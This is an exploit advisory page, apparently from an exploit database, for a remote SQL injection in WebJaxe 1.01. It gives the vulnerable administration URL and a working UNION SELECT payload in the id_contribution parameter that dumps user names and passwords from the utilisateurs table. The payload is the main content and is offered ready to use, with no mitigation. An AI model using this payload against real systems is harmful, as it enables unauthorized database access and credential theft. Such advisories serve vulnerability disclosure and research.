WebJaxe 1.01 remote SQL injection

2010-05-19 / 2010-05-20
Credit: IHTeam
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############################################################################### # # Exploit Title: WebJaxe Sql Injection # Date: 14-05-2010 # Author: IHTeam # Software Link: http://media4.obspm.fr/outils/webjaxe/en/ # Version: 1.01 # Tested on: Win/Linux # ############################################################################### !You need a registred user! http://[site]/[path]/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=[SQL] Example (Show username:password): http://localhost/webjaxe/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(prenom,char(58),motdepasse),3,4,5,6/**/FROM/**/utilisateurs


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top